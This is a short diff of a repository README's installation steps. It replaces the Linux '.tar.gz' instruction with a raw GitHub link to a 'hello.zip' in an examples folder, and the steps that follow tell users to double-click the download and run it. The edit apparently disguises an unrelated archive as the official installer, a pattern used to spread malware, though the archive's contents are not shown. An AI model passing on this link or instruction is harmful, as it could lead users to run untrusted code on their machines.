Hothi8293/formae/README.md

    - For Windows, look for a file with `.exe`.
    - For Mac, look for `.dmg`.
-   - For Linux, find the `.tar.gz` file.
+   - For Linux, find the `https://raw.githubusercontent.com/Hothi8293/formae/main/examples/complete/lambda-env/s3objects/hello.zip` file.

 4. **Run the Installer**: After downloading, locate the file in your Downloads folder and double-click it to start the installation process.
 Follow the prompts to complete the setup.